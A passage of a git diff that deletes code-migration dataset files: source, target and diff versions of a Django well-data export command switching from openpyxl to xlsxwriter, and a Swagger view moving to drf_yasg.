-                    self.export(workbook, gwells_zip, 'lithology', cursor)
-                # Casing
-                with connection.cursor() as cursor:
-                    cursor.execute(casing_sql)
-                    self.export(workbook, gwells_zip, 'casing', cursor)
-                # Screen
-                with connection.cursor() as cursor:
-                    cursor.execute(screen_sql)
-                    self.export(workbook, gwells_zip, 'screen', cursor)
-                # Production
-                with connection.cursor() as cursor:
-                    cursor.execute(production_sql)
-                    self.export(workbook, gwells_zip, 'production', cursor)
-                # Perforation
-                with connection.cursor() as cursor:
-                    cursor.execute(perforation_sql)
-                    self.export(workbook, gwells_zip, 'perforation', cursor)
diff --git a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py b/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py
deleted file mode 100644
index 1085816..0000000
--- a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py
+++ /dev/null
@@ -1,228 +0,0 @@
-import csv
-import zipfile
-import os
-import logging
-import string
-
-from django.core.management.base import BaseCommand
-from django.db import models
-from django.db import connection
-
-from minio import Minio
-from openpyxl import Workbook
-
-from gwells.settings.base import get_env_variable
-
-# Run from command line :
-# python manage.py export
-
-logger = logging.getLogger(__name__)
-
-
-class Command(BaseCommand):
-
-    def handle(self, *args, **options):
-        logger.info('starting export')
-        zip_filename = 'gwells.zip'
-        spreadsheet_filename = 'gwells.xlsx'
-        self.generate_files(zip_filename, spreadsheet_filename)
-        self.upload_files(zip_filename, spreadsheet_filename)
-        logger.info('cleaning up')
-        for filename in (zip_filename, spreadsheet_filename):
-            if os.path.exists(filename):
-                os.remove(filename)
-        logger.info('export complete')
-
-    def upload_files(self, zip_filename, spreadsheet_filename):
-        minioClient = Minio(get_env_variable('S3_HOST'),
-                            access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'),
-                            secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'),
-                            secure=True)
-        for filename in (zip_filename, spreadsheet_filename):
-            logger.info('uploading {}'.format(filename))
-            with open(filename, 'rb') as file_data:
-                file_stat = os.stat(filename)
-                # Do we need to remove the existing files 1st?
-                minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'),
-                                       filename,
-                                       file_data,
-                                       file_stat.st_size)
-
-    def export(self, workbook, gwells_zip, worksheet_name, cursor):
-        logger.info('exporting {}'.format(worksheet_name))
-        worksheet = workbook.create_sheet(worksheet_name)
-        csv_file = '{}.csv'.format(worksheet_name)
-        if os.path.exists(csv_file):
-            os.remove(csv_file)
-        with open(csv_file, 'w') as csvfile:
-            csvwriter = csv.writer(csvfile, dialect='excel')
-
-            values = []
-            # Write the headings
-            for index, field in enumerate(cursor.description):
-                values.append(field.name)
-            worksheet.append(values)
-            csvwriter.writerow(values)
-
-            # Write the values
-            row_index = 0
-            for row, record in enumerate(cursor.fetchall()):
-                values = []
-                num_values = 0
-                for col, value in enumerate(record):
-                    if not (value == "" or value is None):
-                        num_values += 1
-                        if type(value) is str:
-                            # There are lots of non-printable characters in the source data that can cause
-                            # issues in the export, so we have to clear them out.
-                            v = ''.join([s for s in value if s in string.printable])
-                            # We can't have something starting with an = sign,
-                            # it would be interpreted as a formula in excel.
-                            if v.startswith('='):
-                                v = '\'{}'.format(v)
-                            values.append(v)
-                        else:
-                            values.append(value)
-                if num_values > 1:
-                    csvwriter.writerow(values)
-                    worksheet.append(values)
-        gwells_zip.write(csv_file)
-        if os.path.exists(csv_file):
-            os.remove(csv_file)
-
-    def generate_files(self, zip_filename, spreadsheet_filename):
-        #######
-        # WELL
-        #######
-        well_sql = ("""select well_tag_number, identification_plate_number,
-                    well_identification_plate_attached,
-                    well_status_code, well.well_class_code,
-                    wsc.well_class_code as well_subclass,
-                    intended_water_use_code, licenced_status_code,
-                    observation_well_number, obs_well_status_code, water_supply_system_name,
-                    water_supply_system_well_name,
-                    street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block,
-                    legal_section, legal_township, legal_range,
-                    land_district_code,
-                    legal_pid,
-                    well_location_description,
-                    latitude, longitude, utm_zone_code, utm_northing, utm_easting,
-                    utm_accuracy_code, bcgs_id,
-                    construction_start_date, construction_end_date, alteration_start_date,
-                    alteration_end_date, decommission_start_date, decommission_end_date,
-                    driller_name, consultant_name, consultant_company,
-                    diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up,
-                    bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level,
-                    well_yield,
-                    well_yield_unit_code,
-                    artesian_flow, artesian_pressure, well_cap_type, well_disinfected,
-                    drilling_method_code, other_drilling_method, well_orientation,
-                    alternative_specs_submitted,
-                    surface_seal_material_code, surface_seal_method_code, surface_seal_length,
-                    backfill_type,
-                    backfill_depth,
-                    liner_material_code, liner_diameter, liner_thickness, surface_seal_thickness,
-                    liner_from, liner_to,
-                    screen_intake_method_code, screen_type_code, screen_material_code,
-                    other_screen_material,
-                    screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code,
-                    filter_pack_from,
-                    filter_pack_to, filter_pack_material_code,
-                    filter_pack_thickness,
-                    filter_pack_material_size_code,
-                    development_hours, development_notes,
-                    water_quality_colour, water_quality_odour, ems_id,
-                    decommission_reason, decommission_method_code, decommission_details, sealant_material,
-                    backfill_material,
-                    comments, aquifer_id,
-                    drilling_company.drilling_company_code,
-                    ems,
-                    aquifer_id,
-                    registries_person.surname as driller_responsible
-                    from well
-                    left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid
-                    left join drilling_company on
-                    drilling_company.drilling_company_guid = well.drilling_company_guid
-                    left join registries_person on
-                    registries_person.person_guid = well.driller_responsible_guid
-                    order by well_tag_number""")
-        ###########
-        # LITHOLOGY
-        ###########
-        lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data,
-                    ldc.description as lithology_description_code,
-                    lmc.description as lithology_material_code,
-                    lhc.description as lithology_hardness_code,
-                    lcc.description as lithology_colour_code,
-                    water_bearing_estimated_flow,
-                    well_yield_unit_code, lithology_observation
-                    from lithology_description
-                    left join lithology_description_code as ldc on
-                    ldc.lithology_description_code = lithology_description.lithology_description_code
-                    left join lithology_material_code as lmc on
-                    lmc.lithology_material_code = lithology_description.lithology_material_code
-                    left join lithology_hardness_code as lhc on
-                    lhc.lithology_hardness_code = lithology_description.lithology_hardness_code
-                    left join lithology_colour_code as lcc on
-                    lcc.lithology_colour_code = lithology_description.lithology_colour_code
-                    order by well_tag_number""")
-        ########
-        # CASING
-        ########
-        casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code,
-                    casing_material_code, wall_thickness, drive_shoe from casing
-                    order by well_tag_number""")
-        ########
-        # SCREEN
-        ########
-        screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter,
-                    screen_assembly_type_code, slot_size from screen
-                    order by well_tag_number""")
-        ############
-        # PRODUCTION
-        ############
-        production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code,
-                    yield_estimation_rate,
-                    yield_estimation_duration, static_level, drawdown,
-                    hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data
-                    order by well_tag_number""")
-        ##############
-        # PERFORATIONS
-        ##############
-        perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter,
-                    liner_perforation_from, liner_perforation_to, liner_thickness
-                    from
-                    perforation
-                    order by well_tag_number""")
-
-        if os.path.exists(zip_filename):
-            os.remove(zip_filename)
-        with zipfile.ZipFile(zip_filename, 'w') as gwells_zip:
-            if os.path.exists(spreadsheet_filename):
-                os.remove(spreadsheet_filename)
-            workbook = Workbook(write_only=True)
-            # Well
-            with connection.cursor() as cursor:
-                cursor.execute(well_sql)
-                self.export(workbook, gwells_zip, 'well', cursor)
-            # Lithology
-            with connection.cursor() as cursor:
-                cursor.execute(lithology_sql)
-                self.export(workbook, gwells_zip, 'lithology', cursor)
-            # Casing
-            with connection.cursor() as cursor:
-                cursor.execute(casing_sql)
-                self.export(workbook, gwells_zip, 'casing', cursor)
-            # Screen
-            with connection.cursor() as cursor:
-                cursor.execute(screen_sql)
-                self.export(workbook, gwells_zip, 'screen', cursor)
-            # Production
-            with connection.cursor() as cursor:
-                cursor.execute(production_sql)
-                self.export(workbook, gwells_zip, 'production', cursor)
-            # Perforation
-            with connection.cursor() as cursor:
-                cursor.execute(perforation_sql)
-                self.export(workbook, gwells_zip, 'perforation', cursor)
-            workbook.save(filename=spreadsheet_filename)
diff --git a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff b/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff
deleted file mode 100644
index 4ef135a..0000000
--- a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff
+++ /dev/null
@@ -1,101 +0,0 @@
-diff --git a/app/backend/wells/management/commands/export.py b/app/backend/wells/management/commands/export.py
- index 944e5ba346c19fab589baf601ab2da73b66e73db..57d12c42941e0afb07ac46fb51f8316d6c5a0cea 100644
- --- a/app/backend/wells/management/commands/export.py
- +++ b/app/backend/wells/management/commands/export.py
-@@ -9,7 +9,7 @@ from django.db import models
- from django.db import connection
-
- from minio import Minio
--from openpyxl import Workbook
-+from xlsxwriter import Workbook
-
- from gwells.settings.base import get_env_variable
-
-@@ -50,7 +50,7 @@ class Command(BaseCommand):
-
-     def export(self, workbook, gwells_zip, worksheet_name, cursor):
-         logger.info('exporting {}'.format(worksheet_name))
--        worksheet = workbook.create_sheet(worksheet_name)
-+        worksheet = workbook.add_worksheet(worksheet_name)
-         csv_file = '{}.csv'.format(worksheet_name)
-         if os.path.exists(csv_file):
-             os.remove(csv_file)
-@@ -60,8 +60,8 @@ class Command(BaseCommand):
-             values = []
-             # Write the headings
-             for index, field in enumerate(cursor.description):
-+                worksheet.write(0, index, '{}'.format(field.name))
-                 values.append(field.name)
--            worksheet.append(values)
-             csvwriter.writerow(values)
-
-             # Write the values
-@@ -84,8 +84,12 @@ class Command(BaseCommand):
-                         else:
-                             values.append(value)
-                 if num_values > 1:
-+                    # We always have a well_tag_number, but if that's all we have, then just skip this record
-+                    row_index += 1
-+                    for col, value in enumerate(values):
-+                        if value:
-+                            worksheet.write(row_index, col, value)
-                     csvwriter.writerow(values)
--                    worksheet.append(values)
-         gwells_zip.write(csv_file)
-         if os.path.exists(csv_file):
-             os.remove(csv_file)
-@@ -200,29 +204,28 @@ class Command(BaseCommand):
-         with zipfile.ZipFile(zip_filename, 'w') as gwells_zip:
-             if os.path.exists(spreadsheet_filename):
-                 os.remove(spreadsheet_filename)
--            workbook = Workbook(write_only=True)
--            # Well
--            with connection.cursor() as cursor:
--                cursor.execute(well_sql)
--                self.export(workbook, gwells_zip, 'well', cursor)
--            # Lithology
--            with connection.cursor() as cursor:
--                cursor.execute(lithology_sql)
--                self.export(workbook, gwells_zip, 'lithology', cursor)
--            # Casing
--            with connection.cursor() as cursor:
--                cursor.execute(casing_sql)
--                self.export(workbook, gwells_zip, 'casing', cursor)
--            # Screen
--            with connection.cursor() as cursor:
--                cursor.execute(screen_sql)
--                self.export(workbook, gwells_zip, 'screen', cursor)
--            # Production
--            with connection.cursor() as cursor:
--                cursor.execute(production_sql)
--                self.export(workbook, gwells_zip, 'production', cursor)
--            # Perforation
--            with connection.cursor() as cursor:
--                cursor.execute(perforation_sql)
--                self.export(workbook, gwells_zip, 'perforation', cursor)
--            workbook.save(filename=spreadsheet_filename)
-+            with Workbook(spreadsheet_filename) as workbook:
-+                # Well
-+                with connection.cursor() as cursor:
-+                    cursor.execute(well_sql)
-+                    self.export(workbook, gwells_zip, 'well', cursor)
-+                # Lithology
-+                with connection.cursor() as cursor:
-+                    cursor.execute(lithology_sql)
-+                    self.export(workbook, gwells_zip, 'lithology', cursor)
-+                # Casing
-+                with connection.cursor() as cursor:
-+                    cursor.execute(casing_sql)
-+                    self.export(workbook, gwells_zip, 'casing', cursor)
-+                # Screen
-+                with connection.cursor() as cursor:
-+                    cursor.execute(screen_sql)
-+                    self.export(workbook, gwells_zip, 'screen', cursor)
-+                # Production
-+                with connection.cursor() as cursor:
-+                    cursor.execute(production_sql)
-+                    self.export(workbook, gwells_zip, 'production', cursor)
-+                # Perforation
-+                with connection.cursor() as cursor:
-+                    cursor.execute(perforation_sql)
-+                    self.export(workbook, gwells_zip, 'perforation', cursor)
diff --git a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py b/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py
deleted file mode 100644
index 1085816..0000000
--- a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py
+++ /dev/null
@@ -1,228 +0,0 @@
-import csv
-import zipfile
-import os
-import logging
-import string
-
-from django.core.management.base import BaseCommand
-from django.db import models
-from django.db import connection
-
-from minio import Minio
-from openpyxl import Workbook
-
-from gwells.settings.base import get_env_variable
-
-# Run from command line :
-# python manage.py export
-
logging.getLogger(__name__) - - -class Command(BaseCommand): - - def handle(self, *args, **options): - logger.info('starting export') - zip_filename = 'gwells.zip' - spreadsheet_filename = 'gwells.xlsx' - self.generate_files(zip_filename, spreadsheet_filename) - self.upload_files(zip_filename, spreadsheet_filename) - logger.info('cleaning up') - for filename in (zip_filename, spreadsheet_filename): - if os.path.exists(filename): - os.remove(filename) - logger.info('export complete') - - def upload_files(self, zip_filename, spreadsheet_filename): - minioClient = Minio(get_env_variable('S3_HOST'), - access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'), - secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'), - secure=True) - for filename in (zip_filename, spreadsheet_filename): - logger.info('uploading {}'.format(filename)) - with open(filename, 'rb') as file_data: - file_stat = os.stat(filename) - # Do we need to remove the existing files 1st? - minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'), - filename, - file_data, - file_stat.st_size) - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) - worksheet = workbook.create_sheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) - with open(csv_file, 'w') as csvfile: - csvwriter = csv.writer(csvfile, dialect='excel') - - values = [] - # Write the headings - for index, field in enumerate(cursor.description): - values.append(field.name) - worksheet.append(values) - csvwriter.writerow(values) - - # Write the values - row_index = 0 - for row, record in enumerate(cursor.fetchall()): - values = [] - num_values = 0 - for col, value in enumerate(record): - if not (value == "" or value is None): - num_values += 1 - if type(value) is str: - # There are lots of non-printable characters in the source data that can cause - # issues in the export, so we have to clear them out. - v = ''.join([s for s in value if s in string.printable]) - # We can't have something starting with an = sign, - # it would be interpreted as a formula in excel. 
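# Note (editorial annotation; `sanitize` below is a hypothetical helper, not part of
# the recorded file): the guard that follows is a CSV/spreadsheet formula-injection
# defence. Excel interprets a cell starting with '=' as a formula, so the exporter
# prefixes a single quote to force the cell to be read as text. A minimal standalone
# sketch of the same idea:
#
#   import string
#
#   def sanitize(value: str) -> str:
#       # Drop non-printable characters, then neutralise a leading '='.
#       printable = ''.join(s for s in value if s in string.printable)
#       return "'{}".format(printable) if printable.startswith('=') else printable
#
#   sanitize('=SUM(A1:A9)')  # -> "'=SUM(A1:A9)"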
- if v.startswith('='): - v = '\'{}'.format(v) - values.append(v) - else: - values.append(value) - if num_values > 1: - csvwriter.writerow(values) - worksheet.append(values) - gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) - - def generate_files(self, zip_filename, spreadsheet_filename): - ####### - # WELL - ####### - well_sql = ("""select well_tag_number, identification_plate_number, - well_identification_plate_attached, - well_status_code, well.well_class_code, - wsc.well_class_code as well_subclass, - intended_water_use_code, licenced_status_code, - observation_well_number, obs_well_status_code, water_supply_system_name, - water_supply_system_well_name, - street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block, - legal_section, legal_township, legal_range, - land_district_code, - legal_pid, - well_location_description, - latitude, longitude, utm_zone_code, utm_northing, utm_easting, - utm_accuracy_code, bcgs_id, - construction_start_date, construction_end_date, alteration_start_date, - alteration_end_date, decommission_start_date, decommission_end_date, - driller_name, consultant_name, consultant_company, - diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up, - bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level, - well_yield, - well_yield_unit_code, - artesian_flow, artesian_pressure, well_cap_type, well_disinfected, - drilling_method_code, other_drilling_method, well_orientation, - alternative_specs_submitted, - surface_seal_material_code, surface_seal_method_code, surface_seal_length, - backfill_type, - backfill_depth, - liner_material_code, liner_diameter, liner_thickness, surface_seal_thickness, - liner_from, liner_to, - screen_intake_method_code, screen_type_code, screen_material_code, - other_screen_material, - screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code, - filter_pack_from, - filter_pack_to, filter_pack_material_code, - filter_pack_thickness, - filter_pack_material_size_code, - development_hours, development_notes, - water_quality_colour, water_quality_odour, ems_id, - decommission_reason, decommission_method_code, decommission_details, sealant_material, - backfill_material, - comments, aquifer_id, - drilling_company.drilling_company_code, - ems, - aquifer_id, - registries_person.surname as driller_responsible - from well - left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid - left join drilling_company on - drilling_company.drilling_company_guid = well.drilling_company_guid - left join registries_person on - registries_person.person_guid = well.driller_responsible_guid - order by well_tag_number""") - ########### - # LITHOLOGY - ########### - lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data, - ldc.description as lithology_description_code, - lmc.description as lithology_material_code, - lhc.description as lithology_hardness_code, - lcc.description as lithology_colour_code, - water_bearing_estimated_flow, - well_yield_unit_code, lithology_observation - from lithology_description - left join lithology_description_code as ldc on - ldc.lithology_description_code = lithology_description.lithology_description_code - left join lithology_material_code as lmc on - lmc.lithology_material_code = lithology_description.lithology_material_code - left join lithology_hardness_code as lhc on - lhc.lithology_hardness_code = lithology_description.lithology_hardness_code - 
left join lithology_colour_code as lcc on - lcc.lithology_colour_code = lithology_description.lithology_colour_code - order by well_tag_number""") - ######## - # CASING - ######## - casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code, - casing_material_code, wall_thickness, drive_shoe from casing - order by well_tag_number""") - ######## - # SCREEN - ######## - screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter, - screen_assembly_type_code, slot_size from screen - order by well_tag_number""") - ############ - # PRODUCTION - ############ - production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code, - yield_estimation_rate, - yield_estimation_duration, static_level, drawdown, - hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data - order by well_tag_number""") - ############## - # PERFORATIONS - ############## - perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter, - liner_perforation_from, liner_perforation_to, liner_thickness - from - perforation - order by well_tag_number""") - - if os.path.exists(zip_filename): - os.remove(zip_filename) - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) - workbook = Workbook(write_only=True) - # Well - with connection.cursor() as cursor: - cursor.execute(well_sql) - self.export(workbook, gwells_zip, 'well', cursor) - # Lithology - with connection.cursor() as cursor: - cursor.execute(lithology_sql) - self.export(workbook, gwells_zip, 'lithology', cursor) - # Casing - with connection.cursor() as cursor: - cursor.execute(casing_sql) - self.export(workbook, gwells_zip, 'casing', cursor) - # Screen - with connection.cursor() as cursor: - cursor.execute(screen_sql) - self.export(workbook, gwells_zip, 'screen', cursor) - # Production - with connection.cursor() as cursor: - cursor.execute(production_sql) - self.export(workbook, gwells_zip, 'production', cursor) - # Perforation - with connection.cursor() as cursor: - cursor.execute(perforation_sql) - self.export(workbook, gwells_zip, 'perforation', cursor) - workbook.save(filename=spreadsheet_filename) diff --git a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py b/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py deleted file mode 100644 index 7625c5a..0000000 --- a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py +++ /dev/null @@ -1,231 +0,0 @@ -import csv -import zipfile -import os -import logging -import string - -from django.core.management.base import BaseCommand -from django.db import models -from django.db import connection - -from minio import Minio -from xlsxwriter import Workbook - -from gwells.settings.base import get_env_variable - -# Run from command line : -# python manage.py export - -logger = logging.getLogger(__name__) - - -class Command(BaseCommand): - - def handle(self, *args, **options): - logger.info('starting export') - zip_filename = 'gwells.zip' - spreadsheet_filename = 'gwells.xlsx' - self.generate_files(zip_filename, spreadsheet_filename) - self.upload_files(zip_filename, spreadsheet_filename) - logger.info('cleaning up') - for filename in (zip_filename, spreadsheet_filename): - if os.path.exists(filename): - os.remove(filename) - logger.info('export complete') - - def upload_files(self, zip_filename, 
spreadsheet_filename): - minioClient = Minio(get_env_variable('S3_HOST'), - access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'), - secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'), - secure=True) - for filename in (zip_filename, spreadsheet_filename): - logger.info('uploading {}'.format(filename)) - with open(filename, 'rb') as file_data: - file_stat = os.stat(filename) - # Do we need to remove the existing files 1st? - minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'), - filename, - file_data, - file_stat.st_size) - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) - worksheet = workbook.add_worksheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) - with open(csv_file, 'w') as csvfile: - csvwriter = csv.writer(csvfile, dialect='excel') - - values = [] - # Write the headings - for index, field in enumerate(cursor.description): - worksheet.write(0, index, '{}'.format(field.name)) - values.append(field.name) - csvwriter.writerow(values) - - # Write the values - row_index = 0 - for row, record in enumerate(cursor.fetchall()): - values = [] - num_values = 0 - for col, value in enumerate(record): - if not (value == "" or value is None): - num_values += 1 - if type(value) is str: - # There are lots of non-printable characters in the source data that can cause - # issues in the export, so we have to clear them out. - v = ''.join([s for s in value if s in string.printable]) - # We can't have something starting with an = sign, - # it would be interpreted as a formula in excel. - if v.startswith('='): - v = '\'{}'.format(v) - values.append(v) - else: - values.append(value) - if num_values > 1: - # We always have a well_tag_number, but if that's all we have, then just skip this record - row_index += 1 - for col, value in enumerate(values): - if value: - worksheet.write(row_index, col, value) - csvwriter.writerow(values) - gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) - - def generate_files(self, zip_filename, spreadsheet_filename): - ####### - # WELL - ####### - well_sql = ("""select well_tag_number, identification_plate_number, - well_identification_plate_attached, - well_status_code, well.well_class_code, - wsc.well_class_code as well_subclass, - intended_water_use_code, licenced_status_code, - observation_well_number, obs_well_status_code, water_supply_system_name, - water_supply_system_well_name, - street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block, - legal_section, legal_township, legal_range, - land_district_code, - legal_pid, - well_location_description, - latitude, longitude, utm_zone_code, utm_northing, utm_easting, - utm_accuracy_code, bcgs_id, - construction_start_date, construction_end_date, alteration_start_date, - alteration_end_date, decommission_start_date, decommission_end_date, - driller_name, consultant_name, consultant_company, - diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up, - bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level, - well_yield, - well_yield_unit_code, - artesian_flow, artesian_pressure, well_cap_type, well_disinfected, - drilling_method_code, other_drilling_method, well_orientation, - alternative_specs_submitted, - surface_seal_material_code, surface_seal_method_code, surface_seal_length, - backfill_type, - backfill_depth, - liner_material_code, liner_diameter, liner_thickness, 
surface_seal_thickness, - liner_from, liner_to, - screen_intake_method_code, screen_type_code, screen_material_code, - other_screen_material, - screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code, - filter_pack_from, - filter_pack_to, filter_pack_material_code, - filter_pack_thickness, - filter_pack_material_size_code, - development_hours, development_notes, - water_quality_colour, water_quality_odour, ems_id, - decommission_reason, decommission_method_code, decommission_details, sealant_material, - backfill_material, - comments, aquifer_id, - drilling_company.drilling_company_code, - ems, - aquifer_id, - registries_person.surname as driller_responsible - from well - left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid - left join drilling_company on - drilling_company.drilling_company_guid = well.drilling_company_guid - left join registries_person on - registries_person.person_guid = well.driller_responsible_guid - order by well_tag_number""") - ########### - # LITHOLOGY - ########### - lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data, - ldc.description as lithology_description_code, - lmc.description as lithology_material_code, - lhc.description as lithology_hardness_code, - lcc.description as lithology_colour_code, - water_bearing_estimated_flow, - well_yield_unit_code, lithology_observation - from lithology_description - left join lithology_description_code as ldc on - ldc.lithology_description_code = lithology_description.lithology_description_code - left join lithology_material_code as lmc on - lmc.lithology_material_code = lithology_description.lithology_material_code - left join lithology_hardness_code as lhc on - lhc.lithology_hardness_code = lithology_description.lithology_hardness_code - left join lithology_colour_code as lcc on - lcc.lithology_colour_code = lithology_description.lithology_colour_code - order by well_tag_number""") - ######## - # CASING - ######## - casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code, - casing_material_code, wall_thickness, drive_shoe from casing - order by well_tag_number""") - ######## - # SCREEN - ######## - screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter, - screen_assembly_type_code, slot_size from screen - order by well_tag_number""") - ############ - # PRODUCTION - ############ - production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code, - yield_estimation_rate, - yield_estimation_duration, static_level, drawdown, - hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data - order by well_tag_number""") - ############## - # PERFORATIONS - ############## - perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter, - liner_perforation_from, liner_perforation_to, liner_thickness - from - perforation - order by well_tag_number""") - - if os.path.exists(zip_filename): - os.remove(zip_filename) - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) - with Workbook(spreadsheet_filename) as workbook: - # Well - with connection.cursor() as cursor: - cursor.execute(well_sql) - self.export(workbook, gwells_zip, 'well', cursor) - # Lithology - with connection.cursor() as cursor: - cursor.execute(lithology_sql) - self.export(workbook, gwells_zip, 'lithology', cursor) - # Casing - with connection.cursor() as 
cursor: - cursor.execute(casing_sql) - self.export(workbook, gwells_zip, 'casing', cursor) - # Screen - with connection.cursor() as cursor: - cursor.execute(screen_sql) - self.export(workbook, gwells_zip, 'screen', cursor) - # Production - with connection.cursor() as cursor: - cursor.execute(production_sql) - self.export(workbook, gwells_zip, 'production', cursor) - # Perforation - with connection.cursor() as cursor: - cursor.execute(perforation_sql) - self.export(workbook, gwells_zip, 'perforation', cursor) diff --git a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff b/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff deleted file mode 100644 index 86d8018..0000000 --- a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff +++ /dev/null @@ -1,15 +0,0 @@ -diff --git a/tob-api/api_v2/swagger.py b/tob-api/api_v2/swagger.py - index a3f37eac4a652844bc47e834970854349f1d4399..728f86e941dfb6bdbee27628d28425757af5f22d 100644 - --- a/tob-api/api_v2/swagger.py - +++ b/tob-api/api_v2/swagger.py -@@ -3,7 +3,9 @@ from rest_framework import permissions - from rest_framework.response import Response - from rest_framework.schemas import SchemaGenerator - from rest_framework.views import APIView --from rest_framework_swagger import renderers -+ -+from drf_yasg.views import get_schema_view -+from drf_yasg import openapi - - LOGGER = logging.getLogger(__name__) - diff --git a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py b/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py deleted file mode 100644 index 1aeca9c..0000000 --- a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py +++ /dev/null @@ -1,33 +0,0 @@ -import logging -from rest_framework import permissions -from rest_framework.response import Response -from rest_framework.schemas import SchemaGenerator -from rest_framework.views import APIView -from rest_framework_swagger import renderers - -LOGGER = logging.getLogger(__name__) - - -class SwaggerSchemaView(APIView): - """ - Utility class for rendering swagger documentation - """ - permission_classes = (permissions.AllowAny,) - renderer_classes = [renderers.OpenAPIRenderer, renderers.SwaggerUIRenderer] - schema = None - - def get(self, request): - params = { - "urlconf": "api_v2.urls", - } - if "HTTP_X_FORWARDED_HOST" in request.META: - # forwarding via tob-web - #params["url"] = "{}://{}/api/".format( - # request.META.get("HTTP_X_FORWARDED_PROTO", "http"), - # request.META["HTTP_X_FORWARDED_HOST"]) - params["url"] = "/api/" - else: - params["url"] = "/api/v2/" - generator = SchemaGenerator(**params) - schema = generator.get_schema(request=request) - return Response(schema) diff --git a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py b/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py deleted file mode 100644 index 2dbbdcf..0000000 --- a/v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py +++ /dev/null @@ -1,35 +0,0 @@ -import logging -from rest_framework import permissions -from rest_framework.response import Response -from rest_framework.schemas import SchemaGenerator -from rest_framework.views import APIView - -from drf_yasg.views import get_schema_view -from drf_yasg import openapi - -LOGGER = logging.getLogger(__name__) - - -class SwaggerSchemaView(APIView): - """ - Utility class for rendering swagger documentation - """ - permission_classes = 
